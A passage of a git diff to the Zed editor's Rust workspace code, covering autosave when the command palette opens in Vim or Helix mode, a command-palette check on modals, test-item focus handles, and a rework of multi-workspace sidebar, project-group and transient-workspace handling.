interacting with the workspace. let focus_handle = item.item_focus_handle(cx); - if !focus_handle.contains_focused(window, cx) - && !workspace.has_active_modal(window, cx) - { - Pane::autosave_item(&item, workspace.project.clone(), window, cx) - .detach_and_log_err(cx); + if focus_handle.contains_focused(window, cx) { + return; } + + let vim_mode = vim_mode_setting::VimModeSetting::is_enabled(cx); + let helix_mode = vim_mode_setting::HelixModeSetting::is_enabled(cx); + + if vim_mode || helix_mode { + // We use the command palette for executing commands in Vim and Helix modes (e.g., `:w`), so + // in those cases we don't want to trigger auto-save if the focus has just been transferred + // to the command palette. + // + // This isn't totally perfect, as you could still switch files indirectly via the command + // palette (such as by opening up the tab switcher from it and then switching tabs that + // way). + if workspace.is_active_modal_command_palette(cx) { + return; + } + } + + Pane::autosave_item(&item, workspace.project.clone(), window, cx) + .detach_and_log_err(cx); } }, ) @@ -1071,7 +1096,7 @@ impl ItemHandle for Entity { self.read(cx).breadcrumb_location(cx) } - fn breadcrumbs(&self, cx: &App) -> Option> { + fn breadcrumbs(&self, cx: &App) -> Option<(Vec, Option)> { self.read(cx).breadcrumbs(cx) } @@ -1110,6 +1135,20 @@ impl ItemHandle for Entity { }) } + /// Called when the containing pane receives a drop on the item or the item's tab. + /// Returns `true` if the item handled it and the pane should skip its default drop behavior. + fn handle_drop( + &self, + active_pane: &Pane, + dropped: &dyn Any, + window: &mut Window, + cx: &mut App, + ) -> bool { + self.update(cx, |this, cx| { + this.handle_drop(active_pane, dropped, window, cx) + }) + } + fn tab_extra_context_menu_actions( &self, window: &mut Window, @@ -1371,7 +1410,8 @@ pub mod test { }; use gpui::{ AnyElement, App, AppContext as _, Context, Entity, EntityId, EventEmitter, Focusable, - InteractiveElement, IntoElement, Render, SharedString, Task, WeakEntity, Window, + InteractiveElement, IntoElement, ParentElement, Render, SharedString, Task, WeakEntity, + Window, }; use project::{Project, ProjectEntryId, ProjectPath, WorktreeId}; use std::{any::Any, cell::Cell, sync::Arc}; @@ -1400,6 +1440,7 @@ pub mod test { pub tab_detail: Cell>, serialize: Option Option>>>>, focus_handle: gpui::FocusHandle, + pub child_focus_handles: Vec, } impl project::ProjectItem for TestProjectItem { @@ -1482,6 +1523,7 @@ pub mod test { workspace_id: Default::default(), focus_handle: cx.focus_handle(), serialize: None, + child_focus_handles: Vec::new(), } } @@ -1529,6 +1571,11 @@ pub mod test { self } + pub fn with_child_focus_handles(mut self, count: usize, cx: &mut Context) -> Self { + self.child_focus_handles = (0..count).map(|_| cx.focus_handle()).collect(); + self + } + pub fn set_state(&mut self, state: String, cx: &mut Context) { self.push_to_nav_history(cx); self.state = state; @@ -1536,14 +1583,19 @@ pub mod test { fn push_to_nav_history(&mut self, cx: &mut Context) { if let Some(history) = &mut self.nav_history { - history.push(Some(Box::new(self.state.clone())), cx); + history.push(Some(Box::new(self.state.clone())), None, cx); } } } impl Render for TestItem { fn render(&mut self, _window: &mut Window, cx: &mut Context) -> impl IntoElement { - gpui::div().track_focus(&self.focus_handle(cx)) + let parent = gpui::div().track_focus(&self.focus_handle(cx)); + self.child_focus_handles + .iter() + .fold(parent, |parent, child_handle| { + parent.child(gpui::div().track_focus(child_handle)) + }) } } @@ -1641,23 +1693,30 @@ pub mod test { where Self: Sized, { - Task::ready(Some(cx.new(|cx| Self { - state: self.state.clone(), - label: self.label.clone(), - save_count: self.save_count, - save_as_count: self.save_as_count, - reload_count: self.reload_count, - is_dirty: self.is_dirty, - buffer_kind: self.buffer_kind, - has_conflict: self.has_conflict, - has_deleted_file: self.has_deleted_file, - project_items: self.project_items.clone(), - nav_history: None, - tab_descriptions: None, - tab_detail: Default::default(), - workspace_id: self.workspace_id, - focus_handle: cx.focus_handle(), - serialize: None, + Task::ready(Some(cx.new(|cx| { + Self { + state: self.state.clone(), + label: self.label.clone(), + save_count: self.save_count, + save_as_count: self.save_as_count, + reload_count: self.reload_count, + is_dirty: self.is_dirty, + buffer_kind: self.buffer_kind, + has_conflict: self.has_conflict, + has_deleted_file: self.has_deleted_file, + project_items: self.project_items.clone(), + nav_history: None, + tab_descriptions: None, + tab_detail: Default::default(), + workspace_id: self.workspace_id, + focus_handle: cx.focus_handle(), + serialize: None, + child_focus_handles: self + .child_focus_handles + .iter() + .map(|_| cx.focus_handle()) + .collect(), + } }))) } diff --git a/crates/workspace/src/modal_layer.rs b/crates/workspace/src/modal_layer.rs index 5949c0b1fffb216f27c939330954ecd8c7343a5c..cb6f21206fc5e1348224dd3e01e5155880e5d883 100644 --- a/crates/workspace/src/modal_layer.rs +++ b/crates/workspace/src/modal_layer.rs @@ -26,6 +26,15 @@ pub trait ModalView: ManagedView { fn render_bare(&self) -> bool { false } + + /// Returns whether this [`ModalView`] is the command palette. + /// + /// This breaks the encapsulation of the [`ModalView`] trait a little bit, but there doesn't seem to be an + /// immediate, more elegant way to have the workspace know about the command palette (due to dependency arrow + /// directions). + fn is_command_palette(&self) -> bool { + false + } } trait ModalViewHandle { @@ -33,6 +42,7 @@ trait ModalViewHandle { fn view(&self) -> AnyView; fn fade_out_background(&self, cx: &mut App) -> bool; fn render_bare(&self, cx: &mut App) -> bool; + fn is_command_palette(&self, cx: &App) -> bool; } impl ModalViewHandle for Entity { @@ -51,6 +61,10 @@ impl ModalViewHandle for Entity { fn render_bare(&self, cx: &mut App) -> bool { self.read(cx).render_bare() } + + fn is_command_palette(&self, cx: &App) -> bool { + self.read(cx).is_command_palette() + } } pub struct ActiveModal { @@ -189,6 +203,13 @@ impl ModalLayer { pub fn has_active_modal(&self) -> bool { self.active_modal.is_some() } + + /// Returns whether the active modal is the command palette. + pub fn is_active_modal_command_palette(&self, cx: &App) -> bool { + self.active_modal + .as_ref() + .map_or(false, |modal| modal.modal.is_command_palette(cx)) + } } impl Render for ModalLayer { diff --git a/crates/workspace/src/multi_workspace.rs b/crates/workspace/src/multi_workspace.rs index d58101f8b5c266fafa2120d8fe58634dc2414762..a61ad3576c57ecd8b1811363d6b5607ead737821 100644 --- a/crates/workspace/src/multi_workspace.rs +++ b/crates/workspace/src/multi_workspace.rs @@ -1,49 +1,132 @@ use anyhow::Result; use feature_flags::{AgentV2FeatureFlag, FeatureFlagAppExt}; +use gpui::PathPromptOptions; use gpui::{ AnyView, App, Context, DragMoveEvent, Entity, EntityId, EventEmitter, FocusHandle, Focusable, ManagedView, MouseButton, Pixels, Render, Subscription, Task, Tiling, Window, WindowId, actions, deferred, px, }; -use project::{DisableAiSettings, Project}; +use project::{DirectoryLister, DisableAiSettings, Project, ProjectGroupKey}; use settings::Settings; +pub use settings::SidebarSide; use std::future::Future; +use std::path::Path; use std::path::PathBuf; +use std::sync::Arc; use ui::prelude::*; use util::ResultExt; +use util::path_list::PathList; +use zed_actions::agents_sidebar::{MoveWorkspaceToNewWindow, ToggleThreadSwitcher}; + +use agent_settings::AgentSettings; +use settings::SidebarDockPosition; +use ui::{ContextMenu, right_click_menu}; const SIDEBAR_RESIZE_HANDLE_SIZE: Pixels = px(6.0); +use crate::AppState; use crate::{ - CloseIntent, CloseWindow, DockPosition, Event as WorkspaceEvent, Item, ModalView, Panel, Toast, - Workspace, WorkspaceId, client_side_decorations, notifications::NotificationId, + CloseIntent, CloseWindow, DockPosition, Event as WorkspaceEvent, Item, ModalView, OpenMode, + Panel, Workspace, WorkspaceId, client_side_decorations, + persistence::model::MultiWorkspaceState, }; actions!( multi_workspace, [ - /// Creates a new workspace within the current window. - NewWorkspaceInWindow, - /// Switches to the next workspace within the current window. - NextWorkspaceInWindow, - /// Switches to the previous workspace within the current window. - PreviousWorkspaceInWindow, /// Toggles the workspace switcher sidebar. ToggleWorkspaceSidebar, + /// Closes the workspace sidebar. + CloseWorkspaceSidebar, /// Moves focus to or from the workspace sidebar without closing it. FocusWorkspaceSidebar, + //TODO: Restore next/previous workspace ] ); +#[derive(Default)] +pub struct SidebarRenderState { + pub open: bool, + pub side: SidebarSide, +} + +pub fn sidebar_side_context_menu( + id: impl Into, + cx: &App, +) -> ui::RightClickMenu { + let current_position = AgentSettings::get_global(cx).sidebar_side; + right_click_menu(id).menu(move |window, cx| { + let fs = ::global(cx); + ContextMenu::build(window, cx, move |mut menu, _, _cx| { + let positions: [(SidebarDockPosition, &str); 2] = [ + (SidebarDockPosition::Left, "Left"), + (SidebarDockPosition::Right, "Right"), + ]; + for (position, label) in positions { + let fs = fs.clone(); + menu = menu.toggleable_entry( + label, + position == current_position, + IconPosition::Start, + None, + move |_window, cx| { + settings::update_settings_file(fs.clone(), cx, move |settings, _cx| { + settings + .agent + .get_or_insert_default() + .set_sidebar_side(position); + }); + }, + ); + } + menu + }) + }) +} + +pub enum MultiWorkspaceEvent { + ActiveWorkspaceChanged, + WorkspaceAdded(Entity), + WorkspaceRemoved(EntityId), +} + pub enum SidebarEvent { - Open, - Close, + SerializeNeeded, } -pub trait Sidebar: EventEmitter + Focusable + Render + Sized { +pub trait Sidebar: Focusable + Render + EventEmitter + Sized { fn width(&self, cx: &App) -> Pixels; fn set_width(&mut self, width: Option, cx: &mut Context); fn has_notifications(&self, cx: &App) -> bool; + fn side(&self, _cx: &App) -> SidebarSide; + + fn is_threads_list_view_active(&self) -> bool { + true + } + /// Makes focus reset back to the search editor upon toggling the sidebar from outside + fn prepare_for_focus(&mut self, _window: &mut Window, _cx: &mut Context) {} + /// Opens or cycles the thread switcher popup. + fn toggle_thread_switcher( + &mut self, + _select_last: bool, + _window: &mut Window, + _cx: &mut Context, + ) { + } + + /// Return an opaque JSON blob of sidebar-specific state to persist. + fn serialized_state(&self, _cx: &App) -> Option { + None + } + + /// Restore sidebar state from a previously-serialized blob. + fn restore_serialized_state( + &mut self, + _state: &str, + _window: &mut Window, + _cx: &mut Context, + ) { + } } pub trait SidebarHandle: 'static + Send + Sync { @@ -51,9 +134,17 @@ pub trait SidebarHandle: 'static + Send + Sync { fn set_width(&self, width: Option, cx: &mut App); fn focus_handle(&self, cx: &App) -> FocusHandle; fn focus(&self, window: &mut Window, cx: &mut App); + fn prepare_for_focus(&self, window: &mut Window, cx: &mut App); fn has_notifications(&self, cx: &App) -> bool; fn to_any(&self) -> AnyView; fn entity_id(&self) -> EntityId; + fn toggle_thread_switcher(&self, select_last: bool, window: &mut Window, cx: &mut App); + + fn is_threads_list_view_active(&self, cx: &App) -> bool; + + fn side(&self, cx: &App) -> SidebarSide; + fn serialized_state(&self, cx: &App) -> Option; + fn restore_serialized_state(&self, state: &str, window: &mut Window, cx: &mut App); } #[derive(Clone)] @@ -83,6 +174,10 @@ impl SidebarHandle for Entity { window.focus(&handle, cx); } + fn prepare_for_focus(&self, window: &mut Window, cx: &mut App) { + self.update(cx, |this, cx| this.prepare_for_focus(window, cx)); + } + fn has_notifications(&self, cx: &App) -> bool { self.read(cx).has_notifications(cx) } @@ -94,52 +189,145 @@ impl SidebarHandle for Entity { fn entity_id(&self) -> EntityId { Entity::entity_id(self) } + + fn toggle_thread_switcher(&self, select_last: bool, window: &mut Window, cx: &mut App) { + let entity = self.clone(); + window.defer(cx, move |window, cx| { + entity.update(cx, |this, cx| { + this.toggle_thread_switcher(select_last, window, cx); + }); + }); + } + + fn is_threads_list_view_active(&self, cx: &App) -> bool { + self.read(cx).is_threads_list_view_active() + } + + fn side(&self, cx: &App) -> SidebarSide { + self.read(cx).side(cx) + } + + fn serialized_state(&self, cx: &App) -> Option { + self.read(cx).serialized_state(cx) + } + + fn restore_serialized_state(&self, state: &str, window: &mut Window, cx: &mut App) { + self.update(cx, |this, cx| { + this.restore_serialized_state(state, window, cx) + }) + } +} + +/// Tracks which workspace the user is currently looking at. +/// +/// `Persistent` workspaces live in the `workspaces` vec and are shown in the +/// sidebar. `Transient` workspaces exist outside the vec and are discarded +/// when the user switches away. +enum ActiveWorkspace { + /// A persistent workspace, identified by index into the `workspaces` vec. + Persistent(usize), + /// A workspace not in the `workspaces` vec that will be discarded on + /// switch or promoted to persistent when the sidebar is opened. + Transient(Entity), +} + +impl ActiveWorkspace { + fn persistent_index(&self) -> Option { + match self { + Self::Persistent(index) => Some(*index), + Self::Transient(_) => None, + } + } + + fn transient_workspace(&self) -> Option<&Entity> { + match self { + Self::Transient(workspace) => Some(workspace), + Self::Persistent(_) => None, + } + } + + /// Sets the active workspace to transient, returning the previous + /// transient workspace (if any). + fn set_transient(&mut self, workspace: Entity) -> Option> { + match std::mem::replace(self, Self::Transient(workspace)) { + Self::Transient(old) => Some(old), + Self::Persistent(_) => None, + } + } + + /// Sets the active workspace to persistent at the given index, + /// returning the previous transient workspace (if any). + fn set_persistent(&mut self, index: usize) -> Option> { + match std::mem::replace(self, Self::Persistent(index)) { + Self::Transient(workspace) => Some(workspace), + Self::Persistent(_) => None, + } + } } pub struct MultiWorkspace { window_id: WindowId, workspaces: Vec>, - active_workspace_index: usize, + active_workspace: ActiveWorkspace, + project_group_keys: Vec, sidebar: Option>, sidebar_open: bool, - _sidebar_subscription: Option, + sidebar_overlay: Option, pending_removal_tasks: Vec>, _serialize_task: Option>, - _create_task: Option>, _subscriptions: Vec, } +impl EventEmitter for MultiWorkspace {} + impl MultiWorkspace { + pub fn sidebar_side(&self, cx: &App) -> SidebarSide { + self.sidebar + .as_ref() + .map_or(SidebarSide::Left, |s| s.side(cx)) + } + + pub fn sidebar_render_state(&self, cx: &App) -> SidebarRenderState { + SidebarRenderState { + open: self.sidebar_open() && self.multi_workspace_enabled(cx), + side: self.sidebar_side(cx), + } + } + pub fn new(workspace: Entity, window: &mut Window, cx: &mut Context) -> Self { let release_subscription = cx.on_release(|this: &mut MultiWorkspace, _cx| { if let Some(task) = this._serialize_task.take() { task.detach(); } - if let Some(task) = this._create_task.take() { - task.detach(); - } for task in std::mem::take(&mut this.pending_removal_tasks) { task.detach(); } }); let quit_subscription = cx.on_app_quit(Self::app_will_quit); - let settings_subscription = - cx.observe_global_in::(window, |this, window, cx| { - if DisableAiSettings::get_global(cx).disable_ai && this.sidebar_open { - this.close_sidebar(window, cx); + let settings_subscription = cx.observe_global_in::(window, { + let mut previous_disable_ai = DisableAiSettings::get_global(cx).disable_ai; + move |this, window, cx| { + if DisableAiSettings::get_global(cx).disable_ai != previous_disable_ai { + this.collapse_to_single_workspace(window, cx); + previous_disable_ai = DisableAiSettings::get_global(cx).disable_ai; } - }); - Self::subscribe_to_workspace(&workspace, cx); + } + }); + Self::subscribe_to_workspace(&workspace, window, cx); + let weak_self = cx.weak_entity(); + workspace.update(cx, |workspace, cx| { + workspace.set_multi_workspace(weak_self, cx); + }); Self { window_id: window.window_handle().window_id(), - workspaces: vec![workspace], - active_workspace_index: 0, + project_group_keys: Vec::new(), + workspaces: Vec::new(), + active_workspace: ActiveWorkspace::Transient(workspace), sidebar: None, sidebar_open: false, - _sidebar_subscription: None, + sidebar_overlay: None, pending_removal_tasks: Vec::new(), _serialize_task: None, - _create_task: None, _subscriptions: vec![ release_subscription, quit_subscription, @@ -148,29 +336,31 @@ impl MultiWorkspace { } } - pub fn register_sidebar( - &mut self, - sidebar: Entity, - window: &mut Window, - cx: &mut Context, - ) { - let subscription = - cx.subscribe_in(&sidebar, window, |this, _, event, window, cx| match event { - SidebarEvent::Open => this.toggle_sidebar(window, cx), - SidebarEvent::Close => { - this.close_sidebar(window, cx); + pub fn register_sidebar(&mut self, sidebar: Entity, cx: &mut Context) { + self._subscriptions + .push(cx.observe(&sidebar, |_this, _, cx| { + cx.notify(); + })); + self._subscriptions + .push(cx.subscribe(&sidebar, |this, _, event, cx| match event { + SidebarEvent::SerializeNeeded => { + this.serialize(cx); } - }); + })); self.sidebar = Some(Box::new(sidebar)); - self._sidebar_subscription = Some(subscription); } pub fn sidebar(&self) -> Option<&dyn SidebarHandle> { self.sidebar.as_deref() } + pub fn set_sidebar_overlay(&mut self, overlay: Option, cx: &mut Context) { + self.sidebar_overlay = overlay; + cx.notify(); + } + pub fn sidebar_open(&self) -> bool { - self.sidebar_open && self.sidebar.is_some() + self.sidebar_open } pub fn sidebar_has_notifications(&self, cx: &App) -> bool { @@ -179,6 +369,12 @@ impl MultiWorkspace { .map_or(false, |s| s.has_notifications(cx)) } + pub fn is_threads_list_view_active(&self, cx: &App) -> bool { + self.sidebar + .as_ref() + .map_or(false, |s| s.is_threads_list_view_active(cx)) + } + pub fn multi_workspace_enabled(&self, cx: &App) -> bool { cx.has_flag::() && !DisableAiSettings::get_global(cx).disable_ai } @@ -188,22 +384,33 @@ impl MultiWorkspace { return; } - if self.sidebar_open { + if self.sidebar_open() { self.close_sidebar(window, cx); } else { self.open_sidebar(cx); if let Some(sidebar) = &self.sidebar { + sidebar.prepare_for_focus(window, cx); sidebar.focus(window, cx); } } } + pub fn close_sidebar_action(&mut self, window: &mut Window, cx: &mut Context) { + if !self.multi_workspace_enabled(cx) { + return; + } + + if self.sidebar_open() { + self.close_sidebar(window, cx); + } + } + pub fn focus_sidebar(&mut self, window: &mut Window, cx: &mut Context) { if !self.multi_workspace_enabled(cx) { return; } - if self.sidebar_open { + if self.sidebar_open() { let sidebar_is_focused = self .sidebar .as_ref() @@ -214,11 +421,13 @@ impl MultiWorkspace { let pane_focus = pane.read(cx).focus_handle(cx); window.focus(&pane_focus, cx); } else if let Some(sidebar) = &self.sidebar { + sidebar.prepare_for_focus(window, cx); sidebar.focus(window, cx); } } else { self.open_sidebar(cx); if let Some(sidebar) = &self.sidebar { + sidebar.prepare_for_focus(window, cx); sidebar.focus(window, cx); } } @@ -226,20 +435,26 @@ impl MultiWorkspace { pub fn open_sidebar(&mut self, cx: &mut Context) { self.sidebar_open = true; - for workspace in &self.workspaces { - workspace.update(cx, |workspace, cx| { - workspace.set_workspace_sidebar_open(true, cx); + if let ActiveWorkspace::Transient(workspace) = &self.active_workspace { + let workspace = workspace.clone(); + let index = self.promote_transient(workspace, cx); + self.active_workspace = ActiveWorkspace::Persistent(index); + } + let sidebar_focus_handle = self.sidebar.as_ref().map(|s| s.focus_handle(cx)); + for workspace in self.workspaces.iter() { + workspace.update(cx, |workspace, _cx| { + workspace.set_sidebar_focus_handle(sidebar_focus_handle.clone()); }); } self.serialize(cx); cx.notify(); } - fn close_sidebar(&mut self, window: &mut Window, cx: &mut Context) { + pub fn close_sidebar(&mut self, window: &mut Window, cx: &mut Context) { self.sidebar_open = false; - for workspace in &self.workspaces { - workspace.update(cx, |workspace, cx| { - workspace.set_workspace_sidebar_open(false, cx); + for workspace in self.workspaces.iter() { + workspace.update(cx, |workspace, _cx| { + workspace.set_sidebar_focus_handle(None); }); } let pane = self.workspace().read(cx).active_pane().clone(); @@ -252,7 +467,7 @@ impl MultiWorkspace { pub fn close_window(&mut self, _: &CloseWindow, window: &mut Window, cx: &mut Context) { cx.spawn_in(window, async move |this, cx| { let workspaces = this.update(cx, |multi_workspace, _cx| { - multi_workspace.workspaces().to_vec() + multi_workspace.workspaces().cloned().collect::>() })?; for workspace in workspaces { @@ -275,112 +490,434 @@ impl MultiWorkspace { .detach_and_log_err(cx); } - fn subscribe_to_workspace(workspace: &Entity, cx: &mut Context) { - cx.subscribe(workspace, |this, workspace, event, cx| { + fn subscribe_to_workspace( + workspace: &Entity, + window: &Window, + cx: &mut Context, + ) { + let project = workspace.read(cx).project().clone(); + cx.subscribe_in(&project, window, { + let workspace = workspace.downgrade(); + move |this, _project, event, _window, cx| match event { + project::Event::WorktreeAdded(_) | project::Event::WorktreeRemoved(_) => { + if let Some(workspace) = workspace.upgrade() { + this.add_project_group_key(workspace.read(cx).project_group_key(cx)); + } + } + _ => {} + } + }) + .detach(); + + cx.subscribe_in(workspace, window, |this, workspace, event, window, cx| { if let WorkspaceEvent::Activate = event { - this.activate(workspace, cx); + this.activate(workspace.clone(), window, cx); } }) .detach(); } - pub fn is_sidebar_open(&self) -> bool { - self.sidebar_open + pub fn add_project_group_key(&mut self, project_group_key: ProjectGroupKey) { + if project_group_key.path_list().paths().is_empty() { + return; + } + if self.project_group_keys.contains(&project_group_key) { + return; + } + self.project_group_keys.push(project_group_key); } - pub fn workspace(&self) -> &Entity { - &self.workspaces[self.active_workspace_index] + pub fn restore_project_group_keys(&mut self, keys: Vec) { + let mut restored = keys; + for existing_key in &self.project_group_keys { + if !restored.contains(existing_key) { + restored.push(existing_key.clone()); + } + } + self.project_group_keys = restored; + } + + pub fn project_group_keys(&self) -> impl Iterator { + self.project_group_keys.iter() } - pub fn workspaces(&self) -> &[Entity] { - &self.workspaces + /// Returns the project groups, ordered by most recently added. + pub fn project_groups( + &self, + cx: &App, + ) -> impl Iterator>)> { + let mut groups = self + .project_group_keys + .iter() + .rev() + .map(|key| (key.clone(), Vec::new())) + .collect::>(); + for workspace in &self.workspaces { + let key = workspace.read(cx).project_group_key(cx); + if let Some((_, workspaces)) = groups.iter_mut().find(|(k, _)| k == &key) { + workspaces.push(workspace.clone()); + } + } + groups.into_iter() } - pub fn active_workspace_index(&self) -> usize { - self.active_workspace_index + pub fn workspaces_for_project_group( + &self, + project_group_key: &ProjectGroupKey, + cx: &App, + ) -> impl Iterator> { + self.workspaces + .iter() + .filter(move |ws| ws.read(cx).project_group_key(cx) == *project_group_key) } - pub fn activate(&mut self, workspace: Entity, cx: &mut Context) { - if !self.multi_workspace_enabled(cx) { - self.workspaces[0] = workspace; - self.active_workspace_index = 0; - cx.notify(); + pub fn remove_folder_from_project_group( + &mut self, + project_group_key: &ProjectGroupKey, + path: &Path, + cx: &mut Context, + ) { + let new_path_list = project_group_key.path_list().without_path(path); + if new_path_list.is_empty() { return; } - let old_index = self.active_workspace_index; - let new_index = self.set_active_workspace(workspace, cx); - if old_index != new_index { - self.serialize(cx); + let new_key = ProjectGroupKey::new(project_group_key.host(), new_path_list); + + let workspaces: Vec<_> = self + .workspaces_for_project_group(project_group_key, cx) + .cloned() + .collect(); + + self.add_project_group_key(new_key); + + for workspace in workspaces { + let project = workspace.read(cx).project().clone(); + project.update(cx, |project, cx| { + project.remove_worktree_for_main_worktree_path(path, cx); + }); } + + self.serialize(cx); + cx.notify(); + } + + pub fn prompt_to_add_folders_to_project_group( + &mut self, + key: &ProjectGroupKey, + window: &mut Window, + cx: &mut Context, + ) { + let paths = self.workspace().update(cx, |workspace, cx| { + workspace.prompt_for_open_path( + PathPromptOptions { + files: false, + directories: true, + multiple: true, + prompt: None, + }, + DirectoryLister::Project(workspace.project().clone()), + window, + cx, + ) + }); + + let key = key.clone(); + cx.spawn_in(window, async move |this, cx| { + if let Some(new_paths) = paths.await.ok().flatten() { + if !new_paths.is_empty() { + this.update(cx, |multi_workspace, cx| { + multi_workspace.add_folders_to_project_group(&key, new_paths, cx); + })?; + } + } + anyhow::Ok(()) + }) + .detach_and_log_err(cx); } - fn set_active_workspace( + pub fn add_folders_to_project_group( + &mut self, + project_group_key: &ProjectGroupKey, + new_paths: Vec, + cx: &mut Context, + ) { + let mut all_paths: Vec = project_group_key.path_list().paths().to_vec(); + all_paths.extend(new_paths.iter().cloned()); + let new_path_list = PathList::new(&all_paths); + let new_key = ProjectGroupKey::new(project_group_key.host(), new_path_list); + + let workspaces: Vec<_> = self + .workspaces_for_project_group(project_group_key, cx) + .cloned() + .collect(); + + self.add_project_group_key(new_key); + + for workspace in workspaces { + let project = workspace.read(cx).project().clone(); + for path in &new_paths { + project + .update(cx, |project, cx| { + project.find_or_create_worktree(path, true, cx) + }) + .detach_and_log_err(cx); + } + } + + self.serialize(cx); + cx.notify(); + } + + pub fn remove_project_group( + &mut self, + key: &ProjectGroupKey, + window: &mut Window, + cx: &mut Context, + ) { + self.project_group_keys.retain(|k| k != key); + + let workspaces: Vec<_> = self + .workspaces_for_project_group(key, cx) + .cloned() + .collect(); + for workspace in workspaces { + self.remove(&workspace, window, cx); + } + + self.serialize(cx); + cx.notify(); + } + + /// Finds an existing workspace in this multi-workspace whose paths match, + /// or creates a new one (deserializing its saved state from the database). + /// Never searches other windows or matches workspaces with a superset of + /// the requested paths. + pub fn find_or_create_local_workspace( + &mut self, + path_list: PathList, + window: &mut Window, + cx: &mut Context, + ) -> Task>> { + if let Some(workspace) = self + .workspaces + .iter() + .find(|ws| PathList::new(&ws.read(cx).root_paths(cx)) == path_list) + .cloned() + { + self.activate(workspace.clone(), window, cx); + return Task::ready(Ok(workspace)); + } + + if let Some(transient) = self.active_workspace.transient_workspace() { + if transient.read(cx).project_group_key(cx).path_list() == &path_list { + return Task::ready(Ok(transient.clone())); + } + } + + let paths = path_list.paths().to_vec(); + let app_state = self.workspace().read(cx).app_state().clone(); + let requesting_window = window.window_handle().downcast::(); + + cx.spawn(async move |_this, cx| { + let result = cx + .update(|cx| { + Workspace::new_local( + paths, + app_state, + requesting_window, + None, + None, + OpenMode::Activate, + cx, + ) + }) + .await?; + Ok(result.workspace) + }) + } + + pub fn workspace(&self) -> &Entity { + match &self.active_workspace { + ActiveWorkspace::Persistent(index) => &self.workspaces[*index], + ActiveWorkspace::Transient(workspace) => workspace, + } + } + + pub fn workspaces(&self) -> impl Iterator> { + self.workspaces + .iter() + .chain(self.active_workspace.transient_workspace()) + } + + /// Adds a workspace to this window as persistent without changing which + /// workspace is active. Unlike `activate()`, this always inserts into the + /// persistent list regardless of sidebar state — it's used for system- + /// initiated additions like deserialization and worktree discovery. + pub fn add(&mut self, workspace: Entity, window: &Window, cx: &mut Context) { + self.insert_workspace(workspace, window, cx); + } + + /// Ensures the workspace is in the multiworkspace and makes it the active one. + pub fn activate( &mut self, workspace: Entity, + window: &mut Window, cx: &mut Context, - ) -> usize { - let index = self.add_workspace(workspace, cx); - self.active_workspace_index = index; + ) { + // Re-activating the current workspace is a no-op. + if self.workspace() == &workspace { + self.focus_active_workspace(window, cx); + return; + } + + // Resolve where we're going. + let new_index = if let Some(index) = self.workspaces.iter().position(|w| *w == workspace) { + Some(index) + } else if self.sidebar_open { + Some(self.insert_workspace(workspace.clone(), &*window, cx)) + } else { + None + }; + + // Transition the active workspace. + if let Some(index) = new_index { + if let Some(old) = self.active_workspace.set_persistent(index) { + if self.sidebar_open { + self.promote_transient(old, cx); + } else { + self.detach_workspace(&old, cx); + cx.emit(MultiWorkspaceEvent::WorkspaceRemoved(old.entity_id())); + } + } + } else { + Self::subscribe_to_workspace(&workspace, window, cx); + let weak_self = cx.weak_entity(); + workspace.update(cx, |workspace, cx| { + workspace.set_multi_workspace(weak_self, cx); + }); + if let Some(old) = self.active_workspace.set_transient(workspace) { + self.detach_workspace(&old, cx); + cx.emit(MultiWorkspaceEvent::WorkspaceRemoved(old.entity_id())); + } + } + + cx.emit(MultiWorkspaceEvent::ActiveWorkspaceChanged); + self.serialize(cx); + self.focus_active_workspace(window, cx); + cx.notify(); + } + + /// Promotes a former transient workspace into the persistent list. + /// Returns the index of the newly inserted workspace. + fn promote_transient(&mut self, workspace: Entity, cx: &mut Context) -> usize { + let project_group_key = workspace.read(cx).project().read(cx).project_group_key(cx); + self.add_project_group_key(project_group_key); + self.workspaces.push(workspace.clone()); + cx.emit(MultiWorkspaceEvent::WorkspaceAdded(workspace)); + self.workspaces.len() - 1 + } + + /// Collapses to a single transient workspace, discarding all persistent + /// workspaces. Used when multi-workspace is disabled (e.g. disable_ai). + fn collapse_to_single_workspace(&mut self, window: &mut Window, cx: &mut Context) { + if self.sidebar_open { + self.close_sidebar(window, cx); + } + let active = self.workspace().clone(); + for workspace in std::mem::take(&mut self.workspaces) { + if workspace != active { + self.detach_workspace(&workspace, cx); + cx.emit(MultiWorkspaceEvent::WorkspaceRemoved(workspace.entity_id())); + } + } + self.project_group_keys.clear(); + self.active_workspace = ActiveWorkspace::Transient(active); cx.notify(); - index } - /// Adds a workspace to this window without changing which workspace is active. - /// Returns the index of the workspace (existing or newly inserted). - pub fn add_workspace(&mut self, workspace: Entity, cx: &mut Context) -> usize { + /// Inserts a workspace into the list if not already present. Returns the + /// index of the workspace (existing or newly inserted). Does not change + /// the active workspace index. + fn insert_workspace( + &mut self, + workspace: Entity, + window: &Window, + cx: &mut Context, + ) -> usize { if let Some(index) = self.workspaces.iter().position(|w| *w == workspace) { index } else { - if self.sidebar_open { - workspace.update(cx, |workspace, cx| { - workspace.set_workspace_sidebar_open(true, cx); - }); - } - Self::subscribe_to_workspace(&workspace, cx); - self.workspaces.push(workspace); + let project_group_key = workspace.read(cx).project().read(cx).project_group_key(cx); + + Self::subscribe_to_workspace(&workspace, window, cx); + self.sync_sidebar_to_workspace(&workspace, cx); + let weak_self = cx.weak_entity(); + workspace.update(cx, |workspace, cx| { + workspace.set_multi_workspace(weak_self, cx); + }); + + self.add_project_group_key(project_group_key); + self.workspaces.push(workspace.clone()); + cx.emit(MultiWorkspaceEvent::WorkspaceAdded(workspace)); cx.notify(); self.workspaces.len() - 1 } } - pub fn activate_index(&mut self, index: usize, window: &mut Window, cx: &mut Context) { - debug_assert!( - index < self.workspaces.len(), - "workspace index out of bounds" - ); - self.active_workspace_index = index; - self.serialize(cx); - self.focus_active_workspace(window, cx); - cx.notify(); - } + /// Clears session state and DB binding for a workspace that is being + /// removed or replaced. The DB row is preserved so the workspace still + /// appears in the recent-projects list. + fn detach_workspace(&mut self, workspace: &Entity, cx: &mut Context) { + workspace.update(cx, |workspace, _cx| { + workspace.session_id.take(); + workspace._schedule_serialize_workspace.take(); + workspace._serialize_workspace_task.take(); + }); - pub fn activate_next_workspace(&mut self, window: &mut Window, cx: &mut Context) { - if self.workspaces.len() > 1 { - let next_index = (self.active_workspace_index + 1) % self.workspaces.len(); - self.activate_index(next_index, window, cx); + if let Some(workspace_id) = workspace.read(cx).database_id() { + let db = crate::persistence::WorkspaceDb::global(cx); + self.pending_removal_tasks.retain(|task| !task.is_ready()); + self.pending_removal_tasks + .push(cx.background_spawn(async move { + db.set_session_binding(workspace_id, None, None) + .await + .log_err(); + })); } } - pub fn activate_previous_workspace(&mut self, window: &mut Window, cx: &mut Context) { - 